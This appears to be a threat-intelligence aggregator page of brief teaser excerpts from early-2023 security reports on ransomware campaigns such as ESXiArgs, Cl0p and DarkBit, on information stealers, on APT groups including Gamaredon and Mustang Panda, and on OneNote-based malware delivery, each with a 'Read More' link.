Tag: MONITOR

8220 Gang is a low-skill crimeware actor known for infecting cloud hosts through n-day vulnerabilities and remote access brute forcing. We have previously detailed how 8220 expanded its botnet and rotated its infrastructure. Since our last write up in October, the group has again switched to new infrastructure and samples, providing us with an opportunity to share an educational walkthrough of the process of investigating cybercrime activity that may be useful to new or lesser experienced SOC teams, analysts and researchers.…

Read More
Sophisticated Malware Employs Multi-Pronged Data Exfiltration

DarkCloud is an Information Stealer Malware. It was first spotted by researchers in 2022. Such malware is designed to collect sensitive information from a victim’s computer or mobile device. Information stealers can be used to gather a variety of data, including passwords, credit card numbers, social security numbers, and other personal or financial information.…

Read More

Executive Summary

On February 3, European hosting providers and computer emergency response teams (CERTs) began warning of a widespread ransomware campaign exploiting CVE-2021-21974, a VMWare ESXi vulnerability for which a patch has been available since February 2021.

Shortly after the warnings’ publication, SecurityScorecard developed an emergency informational signal to give customers visibility into potentially impacted servers.…

Read More
Executive Summary

EclecticIQ researchers observed multiple weaponized phishing emails probably targeting the Security Service of Ukraine (SSU), NATO allies like Latvia, and private companies such as Culver Aviation – a Ukrainian aviation company. Multiple overlaps between these incidents and previous attacks of the Gamaredon APT group (4), such as command and control infrastructures and adversary techniques, helped analysts to highly likely attribute these latest attacks to the Gamaredon group.…

Read More
Introduction

Red team operations are fundamental for achieving an adequate cybersecurity maturity level. So, many different C2 commercial frameworks were born to provide help in managing security tests. However, these technologies can be used at the same time even by attackers to make cyber intrusions.

One of the most emblematic examples of this phenomenon is “Brute Ratel”, a commercial Red Team Operations framework developed by Chetan Nayak, an expert red teamer, formerly both in Mandiant and Crowdstrike, which, starting from the past year, has been used by attackers both in cybercrime and APT operations.…

Read More

By John Fokker, Alfred Alvarado, Tim Hux, Jeffrey Sman, Joao Marques · February 09, 2023

Figure 1: Global Telemetry from Trellix ATLAS for Ips connecting to port 427

Introduction:

Early this week, VMware issued a publication regarding a massive global ransomware campaign targeting “End of General Support (EOGS) and/or significantly out-of-date ESXi products.”…

Read More
Politically-motivated cyberattacks carried out against Israel

One of the largest universities in Israel was recently targeted by a new ransomware called “DarkBit”, and the Threat Actor (TAs) identity behind the attack is still being investigated. While it’s uncertain whether the perpetrator is a disgruntled employee, pro-Palestinian activist, or a combination of both, the ransom note and social media accounts of the DarkBit group may offer some clues about their motives.…

Read More

For each of these domains, the sample tries to connect to many of its subdomains. Most subdomains will start with the letter x, w, or m, followed by a number. In this sample, the first hardcoded domain is fywkuzp[.]ru:7432, and we could observe a infected machine trying to connect to the following domains:

In the end, Mylobot produces thousands of DNS requests, which makes it quite noisy.…

Read More
SUMMARY

Note: This Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and various ransomware threat actors. These #StopRansomware advisories detail historically and recently observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware.…

Read More
Executive Summary SentinelLabs has observed the first Linux variant of Cl0p ransomware. The ELF executable contains a flawed encryption algorithm making it possible to decrypt locked files without paying the ransom. SentinelLabs has published a free decryptor for this variant here. Background

SentinelLabs observed the first ELF variant of Cl0p (also known as Clop) ransomware variant targeting Linux systems on the 26th of December 2022.…

Read More
ESXi Args Ransomware Outbreak Affects Over 1,000 Servers

On February 3rd, CERT-FR warned users about a ransomware attack targeting VMware ESXi servers to deploy ESXi Args Ransomware. The report also stated that the Threat Actors (TAs) leveraging a two-year-old vulnerability tracked as CVE-2021-21974. According to VMware, ESXi versions 7.0 before ESXi70U1c-17325551, 6.7 before ESXi670-202102401-SG, and 6.5 before ESXi650-202102101-SG contain a heap overflow vulnerability in OpenSLP.…

Read More

In September of last year, our Incident Response team was called to an incident that was identified as an attempt of social engineering an online customer service platform. Due to custom-built rules and extensive employee awareness training, we were able to push back these threats. By ingesting the tactics, techniques & procedures (TTPs) of the incident into our autonomous enrichment technology, Arpia, we were able to detect and respond to three other incidents, preventing our clients from being compromised by the mysterious threat actor.…

Read More
Threat Actors Ramp Up OneNote Attachment Usage in their Attacks

Threat Actors (TAs) are using spam emails to trick individuals into downloading malware, such as Remote Access Trojans (RATs) and Stealers, to infect their devices and steal sensitive information. Cyble Research & Intelligence Labs (CRIL) closely monitors different malware families and routinely publishes informative blogs to educate our readers.…

Read More
Threat Actor Leveraging Microsoft OneNote To infect Users

Threat Actors (TAs) continuously adopt new tactics for infecting users for several reasons, including avoiding detection by anti-virus solutions, increasing the likelihood of successful infections, and seeking the challenge of creating new methods of infecting victims.

Recently, several malware families have been spotted using OneNote attachments in their spam campaigns.…

Read More
EXECUTIVE SUMMARY Since at least 2019, the Mustang Panda threat actor group has targeted government and public sector organizations across Asia and Europe [3] with long-term cyberespionage campaigns in line with strategic interests of the Chinese government. In November 2022, Mustang Panda shifted from using archive files to using malicious optical disc image (ISO) files containing a shortcut (LNK) file to deliver the modified version of PlugX malware.…
Read More